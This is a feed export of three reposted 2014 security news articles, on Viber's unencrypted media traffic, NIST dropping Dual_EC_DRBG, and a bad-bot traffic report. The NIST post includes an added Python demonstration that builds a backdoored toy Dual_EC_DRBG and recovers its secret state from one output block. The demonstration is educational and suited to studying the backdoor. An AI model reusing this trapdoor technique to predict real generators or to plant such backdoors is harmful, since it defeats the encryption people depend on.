Anonymoushttp://www.blogger.com/profile/11284358086402489118noreply@blogger.com0tag:blogger.com,1999:blog-4996980881256752769.post-9209288070514542852014-04-24T21:03:00.005-07:002014-04-24T21:03:57.241-07:00[securityaffairs] Viber vulnerable to MITM attack, million users at risk<h2 align="justify" class="post-title entry-title url" style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 1.3em; line-height: 26.399999618530273px; margin: 0px; padding: 15px 0px 5px;">
Security researchers at the UNH Cyber Forensics Research & Education Group have discovered a serious flaw in the Viber messaging and voice system.<a name='more'></a></h2>
<div class="post-body entry-content" style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px;">
<div class="articlebodyonly" id="articlebodyonly" style="color: black;">
<div id="aim12673910930518773921">
<div dir="ltr">
<div dir="ltr">
<div>
Mobile app security is a principal concern for security experts: by exploiting flaws in popular applications like <a href="http://securityaffairs.co/wordpress/23046/hacking/whatsapp-flaw-private-chats.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="WhatsApp flaw allows hackers to steal private Chats on Android devices">WhatsApp</a>, <a href="http://securityaffairs.co/wordpress/24013/hacking/flickr-affected-critical-sql-injection-remote-code-execution-bugs.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="Flickr affected by critical SQL Injection and Remote Code Execution bugs">Flickr</a> or Viber, hackers could expose the data of millions of end users.</div>
<div>
Last week a group of researchers at the UNH Cyber Forensics Research & Education Group discovered a vulnerability in the <a href="http://securityaffairs.co/wordpress/24060/hacking/intelligence-exploit-whatsapp-bug-track-users-location.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="Intelligence could exploit Whatsapp bug to track users location">WhatsApp</a> “Location Share” feature that exposes the user’s location to attackers.</div>
<div>
The same group examined another popular messaging app, Viber, and found that it fails to implement security best practices, threatening the <a href="http://securityaffairs.co/wordpress/13191/laws-and-regulations/the-legislation-of-privacy-new-laws-that-will-change-your-life.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="The Legislation of Privacy: New Laws That Will Change Your Life">privacy</a> of more than 150 million users.</div>
<div>
</div>
<div>
The Viber application, available for Android, iOS, Windows Phone, BlackBerry and desktop, provides a free voice calling service to its users and also lets them share text messages, videos and their location.</div>
</div>
</div>
</div>
<div id="aim22673910930518773921">
<div>
</div>
<div>
The researchers discovered that users’ data is stored unencrypted on Viber’s Amazon servers. According to the researchers, the images and videos of any Viber user can be accessed without any <a href="http://securityaffairs.co/wordpress/14767/security/two-factor-authentication-security.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="Two-factor authentication, necessary but not sufficient to be safe">authentication</a>: an attacker who intercepts a link sent by Viber, in a classic <a href="http://securityaffairs.co/wordpress/22449/hacking/whatsapp-lack-certificate-pinning.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="WhatsApp lack enforcing certificate pinning, users exposed to MITM">MITM</a> attack scenario, can use it to access the victim’s data.</div>
<div>
The image below reproduces a typical attack scenario against a Viber user; an attacker can use any network analysis tool on the market, such as NetworkMiner, Wireshark or NetWitness, to sniff Viber traffic.</div>
<div>
<blockquote class="tr_bq" style="border-left-color: rgb(203, 202, 200); border-left-style: solid; border-left-width: 3px; color: #666666; font-style: italic; line-height: 1.5em; margin: 20px 0px 20px 20px; padding: 0px 0px 0px 20px;">
<div style="font-size: 1em; margin-bottom: 10px; padding: 0px;">
“<i>Anyone, including the service providers will be able to collect this information – and anyone that sets up a rogue AP, or any man-in-the middle attacks such as ARP poisoning will be able to capture this unencrypted traffic and view the images and videos received as well as the locations being sent or received by a phone.</i>” said Professor <i>Ibrahim Baggili and Jason Moore</i>.</div>
</blockquote>
</div>
<div>
</div>
<div>
<a href="http://securityaffairs.co/wordpress/wp-content/uploads/2014/04/Viber-attack-scenario.png" style="color: #4265a7; font-weight: bold; text-decoration: none;"><img alt="Viber attack scenario" class="aligncenter wp-image-24308" height="273" src="http://securityaffairs.co/wordpress/wp-content/uploads/2014/04/Viber-attack-scenario.png" style="border: none; display: block; margin-left: auto; margin-right: auto;" title="Viber vulnerable to MITM attack, million users at risk" width="487" /></a></div>
<div>
</div>
<div>
</div>
<div>
In a video, the researchers demonstrated that Viber does not encrypt data such as images, doodles, videos and location images while exchanging them with its Amazon servers, which allows an attacker to capture this unencrypted traffic with a <a href="http://thehackernews.com/search/label/Man-in-the-Middle" style="color: #3d5a99; font-weight: bold; text-decoration: none;" target="_blank">man-in-the-middle attack</a>.</div>
<blockquote style="border-left-color: rgb(203, 202, 200); border-left-style: solid; border-left-width: 3px; color: #666666; font-style: italic; line-height: 1.5em; margin: 20px 0px 20px 20px; padding: 0px 0px 0px 20px;">
<em>“<span style="color: #01153b;">The main issue is that the above-mentioned data is unencrypted, leaving it open for interception through either a Rogue AP, or any man-in-the middle attacks.</span>”</em></blockquote>
<div>
The researchers have written a <a href="http://www.unhcfreg.com/#!Viber-Security-Vulnerabilities-Do-not-use-Viber-until-these-issues-are-resolved/c5rt/BB4208CF-7F0A-4DE1-92A4-529425549683" rel="nofollow" style="color: #3d5a99; font-weight: bold; text-decoration: none;" target="_blank" title="Viber flaws">blog post</a> urging users to stop using Viber until the company fixes these privacy issues.</div>
<div>
The experts have ethically reported the flaw to the Viber security team; at the time I’m writing, they still haven’t received any response.</div>
<div>
</div>
<div>
Let’s see what happens… in the meantime, put your privacy first!</div>
<div>
<a href="http://securityaffairs.co/wordpress/24305/hacking/viber-vulnerable-mitm.html" target="_blank">http://securityaffairs.co/wordpress/24305/hacking/viber-vulnerable-mitm.html</a></div>
</div>
</div>
</div>
Anonymoushttp://www.blogger.com/profile/11284358086402489118noreply@blogger.com0tag:blogger.com,1999:blog-4996980881256752769.post-80980149729111622952014-04-24T21:02:00.002-07:002014-04-24T21:02:27.649-07:00[securityaffairs] NIST removes Dual_EC_DRBG algorithm from Draft Guidance suggesting to abandon it<h2 style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 1.3em; line-height: 26.399999618530273px; margin: 0px; padding: 15px 0px 5px;">
NIST announced that it will request final public comments before the Dual_EC_DRBG generator is officially removed from NIST Special Publication 800-90A, Rev. 1<a name='more'></a></h2>
<div style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
The National Institute of Standards and Technology has decided to abandon the Dual Elliptic Curve Deterministic Random Bit Generator (Dual_EC_DRBG) in response to the controversy raised after the revelations made by <a href="http://securityaffairs.co/wordpress/15133/intelligence/edward-snowden-is-the-responsible-for-disclosure-of-prism-program.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="Edward Snowden is the responsible for disclosure of PRISM program">Edward Snowden</a>. In December, leaked documents were reported to show that <a href="http://securityaffairs.co/wordpress/23607/intelligence/rsa-helped-nsa-again.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="RSA is accused again to have helped NSA to weaken security products">RSA</a> had signed a secret $10 million contract with the National Security Agency to make the flawed Dual_EC_DRBG algorithm the default choice in its BSAFE security library.</div>
<div style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
RSA has always <a href="http://securityaffairs.co/wordpress/20717/intelligence/rsa-refused-claims.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="RSA refused claims on NSA Relationship and encryption backdoor">denied</a> the accusations: the company published a blog post rejecting any inference of a secret partnership with the <a href="http://securityaffairs.co/wordpress/23550/hacking/gchq-nsa-spied-politics.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="How GCHQ and NSA spied on German citizens and global politics">National Security Agency</a> and of a deliberate decision to use the flawed algorithm as the default in its product.</div>
<div style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
<a href="http://securityaffairs.co/wordpress/wp-content/uploads/2014/04/NIST-DUAL_EC_DRBG.png" style="color: #4265a7; font-weight: bold; text-decoration: none;"><img alt="NIST DUAL_EC_DRBG" class="aligncenter wp-image-24299" height="160" src="http://securityaffairs.co/wordpress/wp-content/uploads/2014/04/NIST-DUAL_EC_DRBG.png" style="border: none; display: block; margin-left: auto; margin-right: auto;" title="NIST removes Dual EC DRBG algorithm from Draft Guidance suggesting to abandon it" width="498" /></a></div>
<div style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
NIST immediately ran for cover, publishing an official announcement titled “<a href="http://www.nist.gov/itl/csd/sp800-90-042114.cfm" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="http://www.nist.gov/itl/csd/sp800-90-042114.cfm">NIST Removes Cryptography Algorithm from Random Number Generator Recommendations</a>” that recommends abandoning Dual_EC_DRBG and informs users that it has been <span style="color: black;">removed from its draft guidance on random number generators. </span>NIST suggests the adoption of one of the three remaining approved algorithms in the publication: Hash_DRBG, HMAC_DRBG and CTR_DRBG.</div>
<blockquote style="background-color: #f9f7f5; border-left-color: rgb(203, 202, 200); border-left-style: solid; border-left-width: 3px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: italic; line-height: 1.5em; margin: 20px 0px 20px 20px; padding: 0px 0px 0px 20px;">
<div style="font-size: 1em; margin-bottom: 10px; padding: 0px;">
<em>“<span style="color: black;">Following a public comment period and review, the National Institute of Standards and Technology (NIST) has removed a cryptographic algorithm from its draft guidance on random number generators. Before implementing the change, NIST is requesting final public comments on the revised document, </span><a href="http://csrc.nist.gov/news_events/index.html#apr21" style="color: steelblue; font-weight: bold; text-decoration: none;">Recommendation for Random Number Generation Using Deterministic Random Bit Generators</a><span style="color: black;"> (NIST Special Publication 800-90A, Rev. 1).</span>”</em></div>
</blockquote>
<div style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
Note that NIST did not remove it from its random number generator recommendations without review: the decision followed a public comment period in which researchers were able to examine the standard and its robustness.</div>
<blockquote style="background-color: #f9f7f5; border-left-color: rgb(203, 202, 200); border-left-style: solid; border-left-width: 3px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: italic; line-height: 1.5em; margin: 20px 0px 20px 20px; padding: 0px 0px 0px 20px;">
<div style="font-size: 1em; margin-bottom: 10px; padding: 0px;">
<em>“Some commenters expressed concerns that the algorithm contains a weakness that would allow attackers to figure out the secret cryptographic keys and defeat the protections provided by those keys. Based on its own evaluation, and in response to the lack of public confidence in the algorithm, NIST removed Dual_EC_DRBG from the Rev. 1 document. </em><em>The revised SP 800-90A is available at <a href="http://csrc.nist.gov/news_events/index.html#apr21" style="color: steelblue; font-weight: bold; text-decoration: none;">http://csrc.nist.gov/news_events/index.html#apr21</a> along with instructions for submitting comments.”</em></div>
</blockquote>
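<div style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
The weakness the commenters refer to has a concrete shape, described publicly by Dan Shumow and Niels Ferguson in 2007: Dual_EC_DRBG publishes (most of) the x-coordinate of s·Q, where s is the secret state, and then derives the next state from s·P. If the two fixed points are related as P = d·Q and someone knows d, that someone can take the published point, multiply it by d and obtain s·P, i.e. the next state. The following is an added example, not NIST’s or RSA’s code, that builds a toy Dual_EC_DRBG on a small constructed curve with a d we choose, and recovers the state from one output block. The curve, the points, d, the seed and the 8-bit truncation are all assumptions for the example (the real standard uses P-256 and drops 16 bits); whether such a d exists for the published P-256 points is not publicly known.</div>

```python
# Added example (not from the page, NIST or RSA): a toy Dual_EC_DRBG whose fixed
# points satisfy P = d*Q for a d we choose, showing that whoever knows d can
# recover the generator's secret state from a single output block.
# Curve, points, d, seed and truncation are constructed for this example.

PRIME = 2**127 - 1          # toy field; PRIME % 4 == 3, so a modular sqrt is one pow()
A, B = PRIME - 3, 7         # toy curve y^2 = x^3 + A*x + B over GF(PRIME)
INF = None                  # point at infinity

TRUNC_BITS = 8              # bits dropped from each r (assumption; SP 800-90A drops 16)
OUT_BITS = PRIME.bit_length() - TRUNC_BITS
OUT_MASK = (1 << OUT_BITS) - 1


def _inv(x):
    return pow(x, PRIME - 2, PRIME)


def ec_add(p1, p2):
    """Affine addition; handles doubling, inverse points and infinity."""
    if p1 is INF:
        return p2
    if p2 is INF:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2:
        if (y1 + y2) % PRIME == 0:
            return INF
        lam = (3 * x1 * x1 + A) * _inv(2 * y1) % PRIME
    else:
        lam = (y2 - y1) * _inv((x2 - x1) % PRIME) % PRIME
    x3 = (lam * lam - x1 - x2) % PRIME
    return (x3, (lam * (x1 - x3) - y1) % PRIME)


def ec_mul(k, pt):
    """Double-and-add scalar multiplication (toy; not constant time)."""
    acc = INF
    while k:
        if k & 1:
            acc = ec_add(acc, pt)
        pt = ec_add(pt, pt)
        k >>= 1
    return acc


def lift_x(x):
    """Return a point (x, y) on the curve, or None if no such point exists."""
    rhs = (x * x * x + A * x + B) % PRIME
    y = pow(rhs, (PRIME + 1) // 4, PRIME)
    return (x, y) if y * y % PRIME == rhs else None


def x_of(pt):
    return 0 if pt is INF else pt[0]


def dual_ec_generate(state, P, Q, n):
    """n output blocks of Dual_EC_DRBG with no additional input.
    Returns (outputs, states); states[i] is the secret s after block i."""
    outputs, states = [], []
    s = state
    for _ in range(n):
        s = x_of(ec_mul(s, P))            # s_i = x(s_{i-1} * P)
        r = x_of(ec_mul(s, Q))            # r_i = x(s_i * Q)
        outputs.append(r & OUT_MASK)      # publish r_i minus its top TRUNC_BITS bits
        states.append(s)
    return outputs, states


def recover_next_state(out_i, out_next, d, Q):
    """Knowing d with P = d*Q, recover s_{i+1} from output block i; the
    2**TRUNC_BITS guesses for the dropped bits are filtered with block i+1."""
    candidates = []
    for hi in range(1 << TRUNC_BITS):
        r = (hi << OUT_BITS) | out_i
        if r >= PRIME:
            continue
        R = lift_x(r)                     # R = +/-(s_i * Q); the sign does not change x(d*R)
        if R is None:
            continue
        s_next = x_of(ec_mul(d, R))       # d*(s_i*Q) = s_i*(d*Q) = s_i*P, whose x is s_{i+1}
        if x_of(ec_mul(s_next, Q)) & OUT_MASK == out_next:
            candidates.append(s_next)
    return candidates


def find_point(start):
    """First x >= start that lifts to a point with y != 0 (toy base point)."""
    x = start
    while True:
        pt = lift_x(x)
        if pt is not None and pt[1] != 0:
            return pt
        x += 1


Q = find_point(2)
D_SECRET = 0x5EEDC0FFEEDEADBEEF0BADF00D1234   # constructed trapdoor scalar
P = ec_mul(D_SECRET, Q)                       # the relation P = d*Q is the whole backdoor
SEED = int.from_bytes(b"constructed seed, not random", "big") % PRIME


def demo(n_blocks=3):
    """Generate n_blocks outputs, then recover the state from the first block."""
    outputs, states = dual_ec_generate(SEED, P, Q, n_blocks)
    cands = recover_next_state(outputs[0], outputs[1], D_SECRET, Q)
    predicted = [dual_ec_generate(c, P, Q, n_blocks - 2)[0] for c in cands]
    return outputs, states, cands, predicted


if __name__ == "__main__":
    outputs, states, cands, predicted = demo()
    print("true s_2 recovered:", states[1] in cands)
    print("remaining blocks predicted:", all(p == outputs[2:] for p in predicted))
```

<div style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
With the real parameters the only difference is the 16 truncated bits, so the attacker tries 65,536 candidates instead of 256 and needs one full 240-bit output block plus enough of the next block to filter them; once s is known every later output is predictable, which is what “figure out the secret cryptographic keys” means for a TLS handshake whose nonces and ephemeral keys come from this generator. Nothing in the output distinguishes a pair of points with such a d from an honestly generated pair, which is why removal rather than analysis was the only possible remedy.</div>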
<div style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
The move aims to give the cyber security community more transparency on how the standard was vetted.</div>
<blockquote style="background-color: #f9f7f5; border-left-color: rgb(203, 202, 200); border-left-style: solid; border-left-width: 3px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: italic; line-height: 1.5em; margin: 20px 0px 20px 20px; padding: 0px 0px 0px 20px;">
<div style="font-size: 1em; margin-bottom: 10px; padding: 0px;">
“<em>We want to assure the IT cyber security community that the transparent, public process used to rigorously vet our standards is still in place. NIST would not deliberately weaken a cryptographic standard,</em>” NIST stated.</div>
</blockquote>
<div style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
NIST recommends that vendors currently using Dual_EC_DRBG in their products select an alternative algorithm now rather than wait for further revisions of the document.</div>
<blockquote style="background-color: #f9f7f5; border-left-color: rgb(203, 202, 200); border-left-style: solid; border-left-width: 3px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: italic; line-height: 1.5em; margin: 20px 0px 20px 20px; padding: 0px 0px 0px 20px;">
<div style="font-size: 1em; margin-bottom: 10px; padding: 0px;">
“<em>If a product uses Dual_EC_DRBG as the default random number generator, it may be possible to reconfigure the product to use a different default algorithm.</em>” reports NIST.</div>
</blockquote>
<div style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
NIST announced that the public comment period on Special Publication 800-90A will close on May 23.</div>
<div style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
<a href="http://securityaffairs.co/wordpress/24293/security/nist-removes-dual_ec_drbg.html" target="_blank">http://securityaffairs.co/wordpress/24293/security/nist-removes-dual_ec_drbg.html</a></div>
Anonymoushttp://www.blogger.com/profile/11284358086402489118noreply@blogger.com0tag:blogger.com,1999:blog-4996980881256752769.post-39358172010403417562014-04-23T21:31:00.001-07:002014-04-23T21:31:45.694-07:00[securityaffairs] An overview on the Bad Bot Landscape by Distil Networks<h2 style="background-color: #f9f7f5; color: #413f41; font-family: Arial, Helvetica, sans-serif; font-size: 1.3em; line-height: 26.399999618530273px; margin: 0px; padding: 15px 0px 5px;">
Distil Networks, a security firm, has published an interesting report on the Bad Bot Landscape; it is full of data on the evolution of malicious bot infrastructure.<a name='more'></a></h2>
<div style="background-color: #f9f7f5; color: #413f41; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
Surfing the Internet I found <a href="http://info.distilnetworks.com/bad_bot_report_2014" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="http://info.distilnetworks.com/bad_bot_report_2014">The Bad Bot Landscape Report Q1 2014</a>, an interesting study issued by the security firm Distil Networks which provides an analysis of the botnet evolution detected by the company’s systems.</div>
<div style="background-color: #f9f7f5; color: #413f41; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
The Bad Bot Landscape Report Q1 2014 contains statistics on the evolution of malicious infrastructure along different axes of analysis, such as geographical area, originating ISP, originating organization and hosting provider, size and many others.</div>
<div style="background-color: #f9f7f5; color: #413f41; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
Experts at Distil observed an increase in cloud-hosted <a href="http://securityaffairs.co/wordpress/13747/cyber-crime/http-botnets-the-dark-side-of-an-standard-protocol.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="HTTP-Botnets: The Dark Side of an Standard Protocol!">botnets</a>, mainly based on the <a href="http://securityaffairs.co/wordpress/21462/malware/sert-q4-2013-threat-intelligence-report-threat-landscape-evolution.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="SERT Q4 2013 Threat Intelligence Report on threat landscape evolution">Amazon</a> cloud infrastructure, which was seen hosting 14% of bad bot traffic.</div>
<div style="background-color: #f9f7f5; color: #413f41; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
Amazon isn’t the only provider abused by cybercriminals: “cheap hosting” providers are a favourite choice for bad actors because they usually implement poor monitoring and put in place few safeguards to prevent bad bots from originating on their networks.</div>
<div style="background-color: #f9f7f5; color: #413f41; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
<em>Where do bad bots come from?</em></div>
<div style="background-color: #f9f7f5; color: #413f41; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
<a href="http://securityaffairs.co/wordpress/12756/cyber-crime/the-offer-of-russian-underground-for-phishing-campaigns.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="The offer of Russian underground for phishing campaigns">Russia</a>, <a href="http://securityaffairs.co/wordpress/15605/intelligence/hackers-comment-crew-i-changing-tactics.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="Comment Crew, China-based group of hackers is changing tactics">China</a>, and India are not in the top positions of the ranking; the US (46%), Great Britain (19%), Germany (9.6%) and the Netherlands (3.3%) are the top four countries used by criminals to host the malicious infrastructure.</div>
<div style="background-color: #f9f7f5; color: #413f41; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
<a href="http://securityaffairs.co/wordpress/wp-content/uploads/2014/04/The-Bad-Bot-Landscape-Report-Q1-2014-Top-countries.png" style="color: #4265a7; font-weight: bold; text-decoration: none;"><img alt="The Bad Bot Landscape Report Q1 2014 Top countries" class="aligncenter size-full wp-image-24268" height="350" src="http://securityaffairs.co/wordpress/wp-content/uploads/2014/04/The-Bad-Bot-Landscape-Report-Q1-2014-Top-countries.png" style="border: none; display: block; margin-left: auto; margin-right: auto;" title="An overview on the Bad Bot Landscape by Distil Networks" width="389" /></a></div>
<div style="background-color: #f9f7f5; color: #413f41; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
Botmasters prefer those countries because they host the largest number of quality Internet exchange points, an essential factor for the successful deployment of botnets.</div>
<blockquote style="background-color: #f9f7f5; border-left-color: rgb(203, 202, 200); border-left-style: solid; border-left-width: 3px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: italic; line-height: 1.5em; margin: 20px 0px 20px 20px; padding: 0px 0px 0px 20px;">
<div style="color: #413f41; font-size: 1em; margin-bottom: 10px; padding: 0px;">
<em>“Those who develop bad bots want them to attack as fast as possible, prior to detection and mitigation steps, and they want to do this as cost effectively as possible. For this reason, they attempt to use inexpensive cloud hosting providers that offer quick and easy set-up. These cloud providers locate their infrastructure where space and bandwidth come cheap, which is at major Internet exchange points. Therefore, most frequent offending nations represent those with the largest number of quality Internet exchange points.” states The Bad Bot Landscape Report Q1 2014.</em></div>
</blockquote>
<div style="background-color: #f9f7f5; color: #413f41; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
The experts at Distil Networks revealed that Verizon Business was responsible for nearly 11% of all malicious bot traffic, while Level 3 Communications accounted for 10%.</div>
<blockquote style="background-color: #f9f7f5; border-left-color: rgb(203, 202, 200); border-left-style: solid; border-left-width: 3px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: italic; line-height: 1.5em; margin: 20px 0px 20px 20px; padding: 0px 0px 0px 20px;">
<div style="color: #413f41; font-size: 1em; margin-bottom: 10px; padding: 0px;">
<em>“From the ISP perspective, costs run much higher when trying to clean up infected computers. In the case of residential ISPs, informing consumers that their computers are infected with malware and helping them perform the associated cleanup would triple support costs,” explains The Bad Bot Landscape Report Q1 2014.</em></div>
</blockquote>
<div style="background-color: #f9f7f5; color: #413f41; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
Analyzing the botnet distribution per industry, The Bad Bot Landscape Report Q1 2014 reports that the financial services industry is the one that serves up the highest share of bad bot traffic.</div>
<div style="background-color: #f9f7f5; color: #413f41; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
Over the last year Distil detected bad bot traffic originating from every wireless provider operating in the United States; botnets are targeting the <a href="http://securityaffairs.co/wordpress/15759/cyber-crime/android-botnets-on-the-rise-case-study.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="Android botnets on the rise – case study">mobile platform</a>, and this illicit activity grew by more than 1,000 percent in the last 12 months.</div>
<div style="background-color: #f9f7f5; color: #413f41; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
<a href="http://securityaffairs.co/wordpress/wp-content/uploads/2014/04/The-Bad-Bot-Landscape-Report-Q1-2014-Infographic.png" style="color: #4265a7; font-weight: bold; text-decoration: none;"><img alt="The Bad Bot Landscape Report Q1 2014 Infographic" class="aligncenter wp-image-24271" height="575" src="http://securityaffairs.co/wordpress/wp-content/uploads/2014/04/The-Bad-Bot-Landscape-Report-Q1-2014-Infographic.png" style="border: none; display: block; margin-left: auto; margin-right: auto;" title="An overview on the Bad Bot Landscape by Distil Networks" width="493" /></a></div>
<div style="background-color: #f9f7f5; color: #413f41; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
The key findings:</div>
<ul style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; list-style: none; margin: 0px 0px 10px 10px; padding: 0px;">
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; margin: 5px 0px; padding: 0px 0px 0px 17px;"><em>To date, Distil has identified, tracked and catalogued over 8 Billion bad bots</em></li>
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; margin: 5px 0px; padding: 0px 0px 0px 17px;"><em>Bad bots ~doubled as a percentage of all web traffic between Q1 and Q4 2013, from 12.25% to 23.6%.</em></li>
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; margin: 5px 0px; padding: 0px 0px 0px 17px;"><em>Good bots dropped as a percentage of all web traffic between Q1 and Q4 2013, from 27.25% to 19.4%</em></li>
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; margin: 5px 0px; padding: 0px 0px 0px 17px;"><em>More bad bots originate in the USA than from any other country</em></li>
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; margin: 5px 0px; padding: 0px 0px 0px 17px;"><em>The top four bad-bot countries are the USA, Great Britain, Germany and The Netherlands, NOT the usual suspects of Russia, China and India</em></li>
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; margin: 5px 0px; padding: 0px 0px 0px 17px;"><em>Verizon Business and Level 3 Communications originate the most bad bot traffic in a global ISP comparison, 11% and 10% of all bad bot traffic, respectively</em></li>
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; margin: 5px 0px; padding: 0px 0px 0px 17px;"><em>Amazon serves the most bad bot traffic among hosting providers worldwide, 14%</em></li>
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; margin: 5px 0px; padding: 0px 0px 0px 17px;"><em>More than 1,100 ISPs and hosting providers serve bad bots as 70% or more of their total traffic</em></li>
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; margin: 5px 0px; padding: 0px 0px 0px 17px;"><em>Bad bots attack most between 6pm and 9pm ET (US-only data for this point)</em></li>
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; margin: 5px 0px; padding: 0px 0px 0px 17px;"><em>The biggest bad bot of 2013 was “Pushdo”, impacting 4.2 million IP addresses and ~4 million computers</em></li>
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; margin: 5px 0px; padding: 0px 0px 0px 17px;"><em>The Financial Services industry had more organizations serving a high percentage of bad bot traffic than any other industry</em></li>
